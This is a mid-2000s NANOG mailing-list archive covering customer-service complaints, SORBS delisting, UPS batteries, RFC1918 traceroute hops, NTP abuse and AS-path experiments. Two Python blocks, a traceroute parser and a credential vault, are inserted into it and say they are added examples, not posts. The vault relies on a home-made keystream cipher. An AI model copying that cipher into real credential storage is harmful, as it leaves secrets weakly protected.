-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Philip Lavine Sent: Monday, September 25, 2006 11:50 PM To: nanog Subject: decline of customer service Times have changed. My experience has been recently that ISPs and ASPs have dramatically malnourished their first level support staff, which in turn has created a resentful and lazy second tier. I am sick of the "It must be your network/cabling/CPE" attitude that I am getting from some tier 1 ISPs. I'm sick of replacing CSUs and checking extended demarcs while some clown in the POP is re-seating cards in the mux. Moreover, stop accusing my network of latency issues. I ran the packet capture 100 times and the client is still sending a FIN. The reason your application is slow is because your programmers think sockets are something you plug a can opener into. Finally, YOU are my vendor. I pay you money for exceptional service. Thank you for your time. Uh, OK. Where did this come from? Did Philip have a seizure? ARE YOU OK PHILIP? :-P Brian
SORBS Contact
Can someone from SORBS contact me offlist if they are on here. My most recent allocation from ARIN turned out to be dirty IPs, and I'm having trouble getting them removed following the steps on their website (no action on tickets opened). 64.79.128.0/20 Brian Boles [EMAIL PROTECTED]
RE: APC Matrix 5000 question(s)
Hi, I am very sure that the batteries are dead. APC recommends changing the batteries every 3 to 5 years. I'd change them every 3 years to be sure. It's very unlikely that your 6 year old packs are still fully functional. I had the same symptoms at a customer's APC (3000VA) and the battery packs were dead. Try to locate the packs on ebay, can save quite a bunch of money (but beware of low quality packs). http://stores.ebay.com/Gruber-Power-Services I've used them multiple times and been very happy. Malcolm I have used them as well and been fairly happy. Beware that they will spam you to death (and responding to their mailings with removal requests continues to go unanswered). Brian
Re: wrt joao damas' DLV talk on wednesday
On Jun 13, 2006, at 11:55, Randy Bush wrote: but what leaves me wondering is why this is all so difficult. Possibly because many people find writing formal security policies, which I think is what we're really talking about here, to be a dry and unpleasant experience, much less fun than code-hacking or packet-analyzing or whatever else you can find to do instead. why can isc not simply say we plan to vet zones as follows:. and we plan to manage maintenance of key rollover as follows: etc.? Would it help if I volunteered to talk to folks and help write something up? I mean, if there's some other issue that is preventing ISC from nailing this down, then that's one thing. But if it's just a case of never seems to bubble up to the top of the stack, then maybe a little outside assistance can do the trick. Besides, now that the semester's over, I need something besides just firing off resumes (gotta fill that summer time, and not completely lose touch with the Real World!) to keep myself entertained. You may flame when ready, Gridley. -- Brian McMahon brian dot mcmahon at cabrillo dot edu Computer Networking and System Administration Instructor Cabrillo College, Aptos, California
RE: private ip addresses from ISP
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Joe Maimon Sent: Tuesday, May 23, 2006 10:15 AM To: Robert Bonomi Cc: [EMAIL PROTECTED] Subject: Re: private ip addresses from ISP Robert Bonomi wrote: TTL-E messages _do_ have legitimate function in network management. TTL-E messages _can_ originate from RFC1918 space, addressed to 'public internet' addresses. Usefully, and meaningfully. Ever hear of 'traceroute'? Ever use it where packets went across a network using RFC1918 internally? Ever had a route die _between_ two RFC1918 addressed nodes on somebody else's network? I guess this means that providers who utilize rfc1918 along their hops should make an effort to ensure these addresses are not used for icmp messages or translate these addresses when they source icmp. Understandably, translation on providers' networks is not always feasible. A feature on routers that sourced icmp packets to be told specifically which address of the router to source it from would also help. In the Cisco world, I thought that the source would always be the interface that replies to the ICMP packet. That seems to be good form to me. Where am I going wrong?
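The point argued in the message above is that the ICMP time-exceeded replies traceroute depends on can legitimately carry RFC1918 source addresses, so a strict ingress filter on private sources blanks those hops. The following is an added worked example, not code from any poster on the thread: it parses a traceroute, flags hops that answered from RFC1918 space, and models what the same trace looks like through an edge ACL that drops packets with private source addresses. The trace text is constructed from documentation and RFC1918 ranges, not a real capture.

```python
"""Flag RFC1918-sourced hops in a traceroute and show what an edge filter
that drops packets with private source addresses does to the trace.

Added example for the RFC1918/TTL-exceeded discussion; not code from any
poster.  SAMPLE_TRACE is constructed (documentation + RFC1918 ranges).
"""
import ipaddress
import re

# The three RFC1918 private blocks.
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")          # "<hop>  <rest of line>"
IPV4_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")  # first dotted quad on the line

# Constructed sample: hops 2 and 3 answer from RFC1918 addresses, as a
# provider that numbers its internal links from private space would produce.
SAMPLE_TRACE = """\
traceroute to 192.0.2.10 (192.0.2.10), 30 hops max, 60 byte packets
 1  gw.example.net (198.51.100.1)  1.0 ms  1.1 ms  1.0 ms
 2  10.20.30.1 (10.20.30.1)  5.2 ms  5.1 ms  5.3 ms
 3  172.31.0.9 (172.31.0.9)  8.4 ms  8.1 ms  8.2 ms
 4  core.upstream.example (203.0.113.7)  9.0 ms  9.2 ms  9.1 ms
 5  * * *
 6  192.0.2.10 (192.0.2.10)  12.0 ms  12.1 ms  12.0 ms
"""


def is_rfc1918(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def parse_traceroute(text: str) -> list[dict]:
    """One record per hop: {'hop': n, 'addr': str|None, 'private': bool}.
    A hop that timed out ('* * *') has addr None."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue                      # header line, not a hop
        hop, rest = int(m.group(1)), m.group(2)
        ip = IPV4_RE.search(rest)
        addr = ip.group(1) if ip else None
        hops.append({"hop": hop, "addr": addr,
                     "private": bool(addr) and is_rfc1918(addr)})
    return hops


def apply_private_source_filter(hops: list[dict]) -> list[dict]:
    """Model an ingress ACL that drops every packet with an RFC1918 source.
    The ICMP time-exceeded from a privately numbered hop never reaches the
    tracing host, so that hop becomes a timeout; all other hops are unchanged
    and the destination is still reached."""
    out = []
    for h in hops:
        if h["private"]:
            out.append({"hop": h["hop"], "addr": None, "private": False})
        else:
            out.append(dict(h))
    return out


def render(hops: list[dict]) -> list[str]:
    return [f"{h['hop']:2d}  {h['addr'] or '* * *'}"
            + ("  [RFC1918 source]" if h["private"] else "")
            for h in hops]


if __name__ == "__main__":
    parsed = parse_traceroute(SAMPLE_TRACE)
    print("\n".join(render(parsed)))
    print("--- same trace seen through a filter that drops RFC1918 sources ---")
    print("\n".join(render(apply_private_source_filter(parsed))))
```

Run stand-alone it prints the trace twice, once with hops 2 and 3 marked as RFC1918-sourced and once as a host behind a strict private-source ingress filter would see it, with those two hops reduced to `* * *`. The end-to-end path still completes; what is lost is the diagnostic value of the intermediate hops, which is the trade-off the thread is about.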
Re: Geo location to IP mapping
cough scam_snake_oil_etc /cough On Mon, 15 May 2006, Alain Hebert wrote: : :GeoIP - http://www.maxmind.com/geoip/ : :Ashe Canvar wrote: : : : Hi all, : : Can any of you please recommend some IP-to-geo mapping database / web : service ? : : I would like to get resolution down to city if possible. : : Thanks and Regards,
Re: Geo location to IP mapping
I'm not quite comfortable with the idea of building a market audience based on data with at best dubious accuracy. On Mon, 15 May 2006, Martin Hannigan wrote: :At 12:49 PM 5/15/2006, Brian Wallingford wrote: : :cough scam_snake_oil_etc /cough : : :How so?
Re: Open Letter to D-Link about their NTP vandalism
Two concrete technical suggestions to mitigate the volunteered NTP server's usage issues at the DIX: (1) Have someone else anycast the DIX block, and NAT the incoming NTP requests to another NTP stratum-1 server (eg pool address(es)). Or a much better idea: (2) Renumber into a new /24, which is announced only at the DIX with no-export, so that only DIX members are able to reach the server - as was the intended usage of this NTP server in the first place. (The announcement can be made by anyone at the DIX, it is not strictly necessary that the NTP server be the announcer of the /24. And in fact, it need not be a /24, as the server should be the only occupant of the block - but it should not be covered by any globally visible aggregate, at least not one contiguous to the connectivity at the DIX.) As to the liability issue, it is easy enough to envision that someone, somewhere, is relying on time results from NTP for a life-or-death application, like a medical device, and is innocently an impacted third party in this. Sending bad NTP values could in theory be responsible for killing someone's scratch monkey... -- Brian Dickson Email: [EMAIL PROTECTED] http://www.chateau-briand.net Tel : +1 647 234 7282
Re: Welcome back, Ma Bell
Not that mind-boggling. The FCC under the Bush administration has been a joke from the get-go. (This coming from a very right-leaning independent). This is the ultimate shell game, considering ATT's antics last year. cheers, brian On Sun, 5 Mar 2006, Fergie wrote: : :Reuters and CNN/Money also reporting same: : : http://money.cnn.com/2006/03/05/news/companies/att_bellsouth/index.htm : :Mind-boggling. : :- ferg : : : :-- Suresh Ramasubramanian [EMAIL PROTECTED] wrote: : :This is from Dave Farber's list .. : : Subject: Everything old is new again : From: Kevin G. Barkes : : NEWS ALERT : from The Wall Street Journal : : ATT is planning to acquire BellSouth for roughly $65 billion. A : deal between the two could be announced as early as Monday. : :I somehow wonder if the old executives at Ma Bell had already worked :out a timeline for resurrecting her well before she was split up .. : :--srs :-- :Suresh Ramasubramanian ([EMAIL PROTECTED]) : : :-- :Fergie, a.k.a. Paul Ferguson : Engineering Architecture for the Internet : [EMAIL PROTECTED] or [EMAIL PROTECTED] : ferg's tech blog: http://fergdawg.blogspot.com/ : : : -- ___ Brian Wallingford Director, Network Operations MegaNet Communications, TCIX, Inc. ~~~
Comcast contact also.
Also looking for a Comcast contact for mail abuse issues. Please reply off-list. Brian.
RE: McDonalds contact also.
That is so funny. FWIW.. I did try to contact them on-line as well as via phone with no response. Sorry for wasting so much of someone's time that spamming the list impersonating me seemed like a good idea. I should forward this to spam-l and watch the trolls come out. LOL - Brian J. -Original Message- From: Buhrmaster, Gary [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 31, 2006 2:03 PM To: Brian Johnson Subject: RE: McDonalds contact also. (I could not resist responding.) Sorry, your unsolicited idea will not be accepted: Unsolicited Ideas Thank you for your interest to share an idea for a product or service that you believe would be beneficial to McDonald's. Please know, however, that it is McDonald's company's policy not to consider unsolicited ideas from anyone other than our corporate employees, franchise owners and dedicated suppliers. It's not that great ideas cannot come from our valued customers. Each year, however, McDonald's receives thousands of unsolicited ideas and proposals for products and services. Due to the mass volume of these unsolicited ideas and the business challenge of determining what is truly a new idea versus a concept that is already in development, being tested, or previously considered, we must adhere to a strict policy not to accept or review any unsolicited ideas that come from outside the McDonald's system of our corporate employees, franchise owners and suppliers. As a result, we must decline your invitation to review your idea, and hope you can understand and appreciate our business reasons for making this company decision. We do, however, greatly appreciate your interest in McDonald's. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brian Johnson Sent: Tuesday, January 31, 2006 6:25 AM To: nanog@merit.edu Subject: McDonalds contact also. I've got a great idea for a new cheeseburger and want someone to give me a contact at McDonalds. I am too lazy to find one myself, and don't care about wasting any of your time. Please reply off-list. Brian.
RE: Password Security and Distribution
Our company is starting to grow rather quickly and we are starting to have growing pains. We are in the need for a better mechanism for sharing passwords between our engineers. I wish there was a system that let you do the following: * Store and encrypt logins/passwords and access logs in a database * Assign permissions (add new logins/passwords, change password...) to those passwords on a per user/group basis, based on an existing authentication scheme (Windows AD, LDAP, Kerberos...) * SSL web frontend * Reporting. If a user leaves and you want to know which passwords he had access to or has ever accessed so you can change them, this would be really really nice. I've been playing around with Network Password Manager from www.sowsoft.com. It seems like the best product available in this area that I could find that makes sharing passwords kinda easy, but it's a service that runs on Windows, requires a Windows client software installation, and lacks any sort of reporting.
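The wish-list above (encrypted storage, permissions per user or group drawn from an existing directory, an access log, and a report of what a departing engineer could reach) is concrete enough to sketch. What follows is an added example, not code from the poster or from any product named in the message: a small in-memory vault that seals each credential, checks read and write permissions against a user's principals, logs every attempt including denials, and produces the offboarding report. Group membership is a plain dict standing in for an AD/LDAP lookup; the cipher is an HMAC-SHA256 counter-mode keystream with an HMAC tag, which is an illustrative stand-in for a real AEAD such as AES-GCM. The entry names and users are made up.

```python
"""Shared-credential vault sketch: sealed entries, per-user/group ACLs,
an access log, and an offboarding report.

Added example, not the poster's code or any vendor's product.  Assumptions:
`groups` stands in for an AD/LDAP group lookup; seal()/unseal() use an
HMAC-SHA256 keystream plus HMAC tag as a stand-in for a real AEAD (AES-GCM);
everything is held in memory.  The SSL front end the post asks for is out of
scope here.
"""
import hashlib
import hmac
import secrets
import time

NONCE_LEN, TAG_LEN = 16, 32


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    # Counter-mode keystream derived with HMAC; illustrative only.
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Return nonce || ciphertext || tag; the tag covers nonce and ciphertext."""
    nonce = secrets.token_bytes(NONCE_LEN)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expect):      # constant-time tag check
        raise ValueError("ciphertext failed authentication")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class Vault:
    def __init__(self, master_key: bytes, groups: dict[str, set[str]]):
        self.key = master_key
        self.groups = groups      # user -> set of groups (stand-in for AD/LDAP)
        self.entries = {}         # name -> {"blob": bytes, "acl": {"read": set, "write": set}}
        self.log = []             # (timestamp, user, action, entry name, allowed)

    def _principals(self, user: str) -> set[str]:
        return {user} | self.groups.get(user, set())

    def _check(self, user: str, name: str, action: str) -> None:
        entry = self.entries.get(name)
        allowed = entry is not None and bool(self._principals(user) & entry["acl"][action])
        self.log.append((time.time(), user, action, name, allowed))   # denials are logged too
        if not allowed:
            raise PermissionError(f"{user} may not {action} {name!r}")

    def add(self, owner: str, name: str, secret: bytes, read: set[str], write: set[str]) -> None:
        if name in self.entries:
            raise KeyError(f"{name!r} already exists")
        self.entries[name] = {"blob": seal(self.key, secret),
                              "acl": {"read": set(read) | {owner}, "write": set(write) | {owner}}}
        self.log.append((time.time(), owner, "add", name, True))

    def get(self, user: str, name: str) -> bytes:
        self._check(user, name, "read")
        return unseal(self.key, self.entries[name]["blob"])

    def rotate(self, user: str, name: str, new_secret: bytes) -> None:
        self._check(user, name, "write")
        self.entries[name]["blob"] = seal(self.key, new_secret)

    def offboarding_report(self, user: str) -> list[str]:
        """Entries to rotate when `user` leaves: everything the ACL lets them
        read now, plus everything they ever read successfully (ACLs change)."""
        principals = self._principals(user)
        can_read = {n for n, e in self.entries.items() if principals & e["acl"]["read"]}
        did_read = {name for _, u, action, name, ok in self.log
                    if u == user and action == "read" and ok}
        return sorted(can_read | did_read)
```

The two design points worth carrying into a real deployment are in `_check` and `offboarding_report`: every attempt is logged, denied ones included, and the leaver's report is the union of what the current ACL grants and what the log shows was actually read, because a credential someone read last year under an ACL that has since been tightened still has to be rotated.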
Re: [NANOG]Cogent issues
On 11/17/05, Eric Gauthier [EMAIL PROTECTED] wrote: Heya, Just to make analysis easier: Which prefixes should be missing? There seem to be larger problems, http://www.cogent.com returns: Error 404 Not found The host name in the URL you have requested www.cogent.com does not match any virtual server currently running. This maybe because you entered the host name incorrectly, or that the necessary server alias has not been setup. Powered by Zeus Web Server A whois cogent.com returns: Registrant: Cogent Investment Operations Limited 55 Moorgate London EC2R 6PA UK Domain Name: COGENT.COM Administrative Contact: MOITRIER, Regis [EMAIL PROTECTED] BNP PARIBAS 10 Harewood Avenue 4 R 240 London NW1 6AA UK +44 207 595 6777 fax: +44-207-595-5090 Technical Contact: BNP PARIBAS [EMAIL PROTECTED] 10 Harewood Avenue - David Gardner 4R305 London NW1 6AA UK +44 207 595 2000 fax: 123 123 1234 Record expires on 11-Apr-2012. Record created on 11-Apr-1999. Database last updated on 17-Nov-2005 10:57:46 EST. Domain servers in listed order: NS1.BNPPARIBAS.COM 155.140.125.131 NS3.DOMIVESTA.NET 159.50.101.80 NS2.BNPPARIBAS.COM 155.140.125.121 NS4.DOMIVESTA.COM 159.50.203.80 -Brian
Re: [NANOG]Cogent issues
On 11/17/05, Brian Kerr [EMAIL PROTECTED] wrote: There seem to be larger problems, http://www.cogent.com returns: Error 404 Not found Pay no attention, I apparently don't know what I'm doing.
Cisco Cache Engine Log Applications?
Hello, Does anyone have any experience or suggestions on Cisco Cache Log Analyzing/Reporting tools? Ive downloaded Sawmill which isnt too bad but I would like to evaluate a couple more. Windows and Open Source apps are possible candidates. Any help would be greatly appreciated. Thanks, Brian
Time Warner Outage?
Anyone having problems with Time Warner?
alternative to baytech rpc
We are looking for an alternate vendor for the following RPC capable PDUs: 30amp - 110volt - L5-30P plugs. Anyone have suggestions? Baytech is great but we are going to have big problems with supply and our gear is already backordered 2mo. Registrant: Bay Tech 200 North 2nd Street Bay St. Louis, MS 39520 US
RE: New N.Y. Law Targets Hidden Net LD Tolls
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Lesher Sent: Thursday, August 18, 2005 8:31 AM To: nanog list Subject: Re: New N.Y. Law Targets Hidden Net LD Tolls Pardon my ignorance, but don't most phone companies require 10 digit dialing for long-distance? We have similar situations in the rural area I live in, but the customers know if they dial more than 7 digits, it WILL be long distance. No. If you are in an overlay area, such as MD, parts of NoVA and many other states, then 10D is required for ALL local calls. MD does have 11D required for toll; but many states do not, inc. Virginia. (This topic is the vi vs emacs of the telco world, btw. I'm strongly in the 11D for toll camp, but others I respect [Hi Mr. Mayor] feel it's a PITA to dial 10D on every call..) This may have been inspired by ISP-set POP #'s. In a case I know of, a WebTV user did the setup via the 800#, and got told 867-5309 was local and it was automagically loaded into the WebTV box. 90 days later, the phone bill arrived... Now on this one, throw the book at WebTV. If you are gonna make the settings for the customer, you are responsible for the results of your actions. But, of course, I'm sure they have a disclaimer saying that it is your responsibility to ensure the number selected is a local call. - Brian J
Way OT: RE: @Home's 119 domain names up for sale
Holy communist manifesto batman! Let's let the government fix everything. Hold on, hasn't that been tried already? Oh yeah the USSR. That was a blazing success. Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Thursday, August 11, 2005 11:15 AM To: nanog@merit.edu Subject: Re: @Home's 119 domain names up for sale I remember @home.com as being one of the defunct domains for which we always had outbound e-mail queued. But exactly how is this bill related to the domain name sale other than the fact that your press release snippet contains the text string [EMAIL PROTECTED]? Your post doesn't make that clear. Our government spends money on a myriad of initiatives. Conservatives like to decry government spending as a total waste of resources. Keep in mind that every dollar spent by the government goes back into the economy, whether it be money to the oil industry (ala the new Energy Bill, money to Halliburton for Iraq operations), or low-income housing. The point is that the money goes back to citizens in the form of jobs, subsidized purchases (which help business sell items and services and create more jobs), or in the form of tax breaks to extremely wealthy individuals. Contrary to the rhetoric, the money doesn't vanish down a sinkhole. matthew black california state university, long beach Note: The opinions stated herein represent only myself and other like-minded individuals and may not represent my employer. On Wed, 10 Aug 2005 12:09:59 -0500 Frank Coluccio [EMAIL PROTECTED] wrote: re: @Home's 119 domain names up for sale Interesting that you'd bring this up. The federal pork transfer of $1 Billion that was announced on Sunday to bridge the digital divide references an [EMAIL PROTECTED] program as a part of its underpinning. From: http://press.arrivenet.com/pol/article.php/679032.html ---snip: LISC/NEF and One Economy Launch $1 Billion Initiative to Bridge the Digital Divide; Sen. Hillary Clinton Helps Unveil Initiative Sunday, August 07, 2005 Contact: Leslie Kerns of Solomon McCown Co., 617-933-5013 or [EMAIL PROTECTED] or Susan Sheehan of Vogel Communications, 503-449-1666 or [EMAIL PROTECTED] NEW YORK, Aug. 7 /U.S. Newswire/ -- Efforts to close the technological gap between America's haves and have-nots will get a boost this week. Local Initiatives Support Corp. (LISC) and its subsidiary the National Equity Fund (NEF) are partnering with One Economy to launch [EMAIL PROTECTED], a $1 billion initiative that will build more than 15,000 affordable homes with high-speed digital Internet connectivity and provide low-income families personal access to computers and technology services. The initiative expects to connect nearly 100,000 people to the vast advantage of the Internet. ---end snip It makes for some interesting reading for those of you tracking where your tax dollars are going. I'd be interested in reading some comments on this initiative, either on the board or by email. [EMAIL PROTECTED] = On Wed Aug 10 16:44 , Fergie (Paul Ferguson) sent: I know this is horribly off-topic, but seeing a reference to @Home kind of made me a little nostalgic. :-) [snip] Apparently former high-speed Internet provider [EMAIL PROTECTED] once felt likewise. But At Home Liquidating Trust, successor to the once high-flying Internet darling [EMAIL PROTECTED], said Wednesday it is selling the former broadband company's 119 domain names. [snip] http://news.com.com/ExciteHomes+119+domain+names+up+for+sale/2100-1030_3-5826807.html
RE: Way OT: RE: @Home's 119 domain names up for sale
Don't get me wrong. They aren't all bombs. ;-) - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of J.D. Falk Sent: Thursday, August 11, 2005 12:04 PM To: nanog@merit.edu Subject: Re: Way OT: RE: @Home's 119 domain names up for sale On 08/11/05, Brian Johnson [EMAIL PROTECTED] wrote: Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. The Internet started out as a pork project. I'm just sayin'. -- J.D. Falk a decade of cybernothing.org [EMAIL PROTECTED] registered 24 June 1995
RE: Way OT: RE: @Home's 119 domain names up for sale
OK. Wasted was a poor choice of words, but even if the money does get back to the people in some way, it is not doing so in a way that really accomplishes something. Private companies do not invest in something that will not have a return that benefits them. Political spending sometimes will have no return other than political capital. It's like buying candy. You can buy a ton of it, and either eat it or give it away, but in the end it will be gone and very little will be accomplished other than the kids who now love you for doing it. So wasted was a bad term to use. How about used with little return if any. - Brian J. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Thursday, August 11, 2005 1:20 PM To: nanog@merit.edu Subject: Re: Way OT: RE: @Home's 119 domain names up for sale On Thu, 11 Aug 2005 11:57:25 -0500 Brian Johnson [EMAIL PROTECTED] wrote: Holy communist manifesto batman! Let's let the government fix everything. Hold on, hasn't that been tried already? Oh yeah the USSR. That was a blazing success. Conservatives generally aren't against the government helping in areas NO ONE ELSE CAN. It is obvious to everyone involved that the government largely screws up these sorts of initiatives and most of the money ends up wasted anyways. It's these pork projects that kill us. - Brian J. Wasted? Please elaborate. It's not like the money vanishes. The money goes somewhere, usually to pay non-government salaries. Corporate Amerika is wasteful too: WorldCom, Global Crossing, Enron, and Halliburton. These are companies that hurt the lives of millions of Americans, including 40,000,000 citizens of California who pay double the national average for electricity because Enron gamed the system. We pay 15 cents per kilowatt! That wasn't completely the government's fault. matthew black california state university, long beach Note: Opinions expressed are mine and do not necessarily represent my employer.
Re: what will all you who work for private isp's be doing in a few years?
As an economist I know likes to say: It depends. To a varying extent (in some markets more than others), the massive oversubscription of cable that meant poor bandwidth/latency at peak times has declined to the point where the older arguments of committed versus max are less meaningful. Of course in some places it's still terrible, but not everywhere. Besides, distance and crappy phone lines can make a chump out of DSL as well. Also, let's be careful when we talk about the typical user and whether they understand the difference. The typical user may simply not even care, even IF they know the difference. In fact, many that do know the difference may prefer (for whatever reason) to take the higher max of cable, especially if in their neighbourhood that max is achieved quite frequently. Further, who's to say that at some point the cable companies won't start offering minimum guaranteed bandwidth? I doubt they will, but if they were to, then a big advantage of DSL falls apart. Let's also not forget that many of us (myself included) choose not to procure landlines. This can be an extra $10-$30/month on top of the ISP charges. That's a big part of why I have cable at home, and I know others in the same situation. Sure, Oceanic/Earthlink here is worthless - took me 2 weeks to get an install time, and then the lead time on that is 3 weeks (1 week from this Saturday at this point..). But who cares? I'm using someone's open wifi. - bri Shane Owens wrote: On this I am wondering what the user market would choose with an offer from a DSL provider of a guaranteed bandwidth purchase with a contention based cap on max speed. For example DSL sold with a guaranteed bandwidth availability of 256K (or 512K, 768K etc based on 256K increments) with an up to maximum of 7-10Mbps. Would the typical user understand the difference between this and the standard Comcast marketing of up to speeds without any service guarantee? Shane It won't be long before the telcos respond by offering DSL at the same speed/price. I've heard (but don't *know*) that SBC is selling 6 down and 1 up in Houston and Dallas for $35. We're doing a fair business selling accelerated dial up for $15. It's surprising how many folks don't want broadband. You don't need 4mb down to read your email. And once you get outside of the city limits there's a good sized market that can't get any type of broadband, especially cable. We may decline some, but I don't think that ISPs are going away anytime soon. Bob Martin -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
Re: what will all you who work for private isp's be doing in a few years?
For every day a company does the same thing they did yesterday, they will be in business one day fewer ... or something like that. - bri Matt Bazan wrote: bottom line is that in a few years everything will be virtualized and consolidation will rule the land. there will be single turnkey solutions for the end user / corporate environment that will be infinitely configurable to meet the latest trends and needs. there will be no use for the small time 'innovator' or 'player' except in a purely academic environment. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Mark D. Bodley Sent: Wednesday, May 11, 2005 2:44 PM To: 'Stephen J. Wilcox'; Matt Bazan Cc: [EMAIL PROTECTED] Subject: RE: what will all you who work for private isp's be doing in a few years? Matt, your questions seem extremely prejudiced to a determined outcome. In my opinion resellers are in the long run going to lose because of lack of tangible assets (there is my bias, on the table. I have my own facilities, and equipment). However because pure resellers lack the facilities they can be resellers (and often are) of whatever the technology of the day is. Strangely, many resellers grow into facilities based carriers, but if they do not, then they can always move to the next thing. If you sold ISDN in the 90's, and you knew how to walk someone through configuring their Pipeline, you were better than Bell (read PSI Net). If you could accurately test and deliver DSL to a client 3-5 years ago (read COVAD), you were better than Bell. In the future, who knows what it will be (my bet is wireless, and we all cook like chickens in a Showtime rotisserie); the prevailing trait of those that have been in this for a long time is adaptation. There was a day when selling access off an ISDN connection was doable. I got out of the straight access market in the late 90's. I provide, and resell connectivity, with static routes to applications I host, or maintain. Hopefully the straight resellers of today will be selling microwave, or implant connectivity, or whatever in a few years. Bottom-line, public or not, Mom and Pop or not, no matter what you do in this business you have to be ready to adapt. If you are huge and don't catch the next wave you could be just as dead as the smaller guys that don't catch that next wave. Mark D. Bodley President Cyrix Systems [EMAIL PROTECTED] www.cyrixsys.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stephen J. Wilcox Sent: Wednesday, May 11, 2005 4:12 PM To: Matt Bazan Cc: [EMAIL PROTECTED] Subject: Re: what will all you who work for private isp's be doing in a few years? On Wed, 11 May 2005, Matt Bazan wrote: why in the world would anyone want to purchase dsl from a private reseller when i can get 4mb down 384 up from comcast for $25? think you dsl resellers out there are doomed. in fact, just a matter of time before most of you isps are down the toilet. i'm reminded of the mom and pop grocery store phenomenon that has now been replaced by the kohls, a&p, whole foods etc. of course there will always be niche markets but this is less applicable for a pure commodity like bandwidth. yeah, i suppose you'll say something about value added services and such and you may have a point but i doubt that will keep the ship afloat for long. Matt, first what's your affiliation and experience in this arena? That these markets exist, and more profitably so than the large carriers, suggests the problems you are raising don't exist. What is your theory based on? You only cite your personal preference to buy from Comcast, which cannot be said to be indicative of the market. Grocery stores are not comparable; this is a different industry and different market. Also bandwidth is not a pure commodity, and DSL is not pure bandwidth. I think your argument is at best uninformed, at worst non-existent.. you need to provide some references, examples, figures, whatever.. else this is little more than trolling. Steve -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
Re: Blocking port udp/tcp 1433/1434
End to end, but I'm afraid current realities do not always permit that approach and we must occasionally build walls. Sure, I wish people would fully step up to the plate and demand robust software/protocols. Secure, strong encryption and software that isn't filled with buffer overflows and other ludicrously should-be-over-the-hill bugs. Etc etc.. This is the part where the crickets chirp, and everyone laughs at me. So, if people want to screw up their own machines in isolation, that's fine but when it takes down half your network - bri [EMAIL PROTECTED] wrote: On Thu, 12 May 2005 04:15:07 -1000, Brian Russo said: Is there now justification for allowing transit for ms-sql slammer ports? That depends. Do you believe in end-to-end or walled-garden? -- Brian Russo [EMAIL PROTECTED] (808) 277 8623
RE: Heads up: Long AS-sets announced in the next few days
James [mailto:[EMAIL PROTECTED] wrote: They are not playing with the core. The result of what they are doing is dependent on specific topology and level of direction they are throwing prefixes at. While I will not dispute your statement, I believe that every ASN should be responsible for their own and should not trust the General Internet to not cause harm on their network. If your router is going to crash b/c of someone advertising an unusual AS_PATH, I don't view that differently from a box getting owned because it was running an unpatched OS since 1999 without any firewall rules either. -J I think most of the concern comes from the fact that this experiment is being done on a network that many people rely upon for various reasons, and its unknown side effects are in the scope of global financial/communication/emergency crises. It might not cause any harm, but I'd think you guys could have probably come up with a better test bed than using other people's equipment and networks without permission and risking unforeseen disasters. Why wasn't this experiment tested in a lab environment? We don't test new pharmaceuticals directly on humans in the first round of testing, and after they've been proven safe on animals, the tests then go on to compensated volunteers. Even if this type of experiment fell into compliance with the RFCs, it surely wasn't the intended use of AS_PATHs and should be considered experimental, and therefore tested in a lab setting. The risks imposed by using the global internet routing infrastructure as your testbed far outweigh any benefits your tool might realize. If this experiment that you're running causes downtime for someone else's systems, are you willing to pay for the damages? -Brian
RE: Goofle/Sprint having problems?
